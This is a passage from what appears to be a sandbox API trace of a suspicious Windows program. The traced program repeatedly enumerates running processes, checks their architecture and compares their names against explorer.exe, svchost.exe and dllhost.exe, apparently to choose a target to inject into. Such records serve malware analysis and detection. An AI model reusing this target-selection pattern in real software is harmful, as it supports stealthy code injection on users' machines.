(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0217.613] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.613] CloseHandle (hObject=0xd8) returned 1 [0217.613] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0217.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0217.613] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.613] CloseHandle (hObject=0xd8) returned 1 [0217.613] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0217.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0217.614] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.614] CloseHandle (hObject=0xd8) returned 1 [0217.614] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0217.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0217.614] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.614] CloseHandle (hObject=0xd8) returned 1 [0217.615] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0217.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0217.615] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.615] CloseHandle (hObject=0xd8) returned 1 [0217.615] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0217.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0217.616] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.616] CloseHandle (hObject=0xd8) returned 1 [0217.616] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0217.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0217.616] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.616] CloseHandle (hObject=0xd8) returned 1 [0217.616] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0217.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0217.617] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.617] CloseHandle (hObject=0xd8) returned 1 [0217.617] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0217.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0217.617] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.617] CloseHandle (hObject=0xd8) returned 1 [0217.617] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0217.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0217.618] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.618] CloseHandle (hObject=0xd8) returned 1 [0217.618] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0217.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0217.619] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.619] CloseHandle (hObject=0xd8) returned 1 [0217.619] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0217.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0217.619] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.619] CloseHandle (hObject=0xd8) returned 1 [0217.619] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0217.620] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0217.620] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0217.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0217.621] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0217.621] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0217.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0217.622] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0217.622] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.622] CloseHandle (hObject=0xd8) returned 1 [0217.622] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0217.622] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0217.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0217.623] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.623] CloseHandle (hObject=0xd8) returned 1 [0217.623] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0217.623] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0217.623] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0217.623] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0217.623] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0217.624] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.624] CloseHandle (hObject=0xd8) returned 1 [0217.624] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0217.625] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.625] CloseHandle (hObject=0xd8) returned 1 [0217.625] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0217.625] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0217.625] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.625] CloseHandle (hObject=0xd8) returned 1 [0217.625] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.626] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0217.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0217.626] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0217.626] CloseHandle (hObject=0xd8) returned 1 [0217.626] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0217.627] CloseHandle (hObject=0xd4) returned 1 [0217.627] Sleep (dwMilliseconds=0x3e8) [0218.643] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0218.645] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0218.646] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0218.646] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0218.647] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0218.647] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0218.648] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0218.648] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0218.649] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0218.649] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0218.650] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0218.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0218.650] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0218.651] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0218.651] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0218.652] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0218.652] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0218.653] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0218.653] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0218.654] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0218.654] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0218.655] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.655] CloseHandle (hObject=0xd8) returned 1 [0218.655] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0218.655] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0218.655] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0218.655] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0218.656] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0218.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0218.656] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.656] CloseHandle (hObject=0xd8) returned 1 [0218.656] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0218.656] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0218.656] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0218.656] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0218.657] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0218.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0218.657] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0218.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0218.658] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.658] CloseHandle (hObject=0xd8) returned 1 [0218.658] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0218.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0218.659] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.659] CloseHandle (hObject=0xd8) returned 1 [0218.659] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0218.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0218.659] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.659] CloseHandle (hObject=0xd8) returned 1 [0218.659] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0218.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0218.660] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0218.660] CloseHandle (hObject=0xd8) returned 1 [0218.660] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, 